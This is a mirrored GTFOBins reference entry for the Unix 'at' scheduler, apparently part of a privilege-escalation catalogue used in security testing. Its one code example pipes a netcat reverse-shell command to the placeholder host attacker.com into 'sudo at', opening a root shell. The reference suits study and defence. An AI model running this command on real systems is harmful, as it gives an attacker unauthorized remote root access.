1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-18 05:21:35 +01:00
GTFOBins.github.io/_gtfobins/at.md
2021-01-15 20:34:57 +01:00

8 lines
242 B
Markdown

---
description: |
at is a command-line utility that allows you to schedule commands to be executed at a particular time.
functions:
sudo:
- code: |
echo "nc attacker.com 12345 -e /bin/bash" | sudo at now +1 minutes
---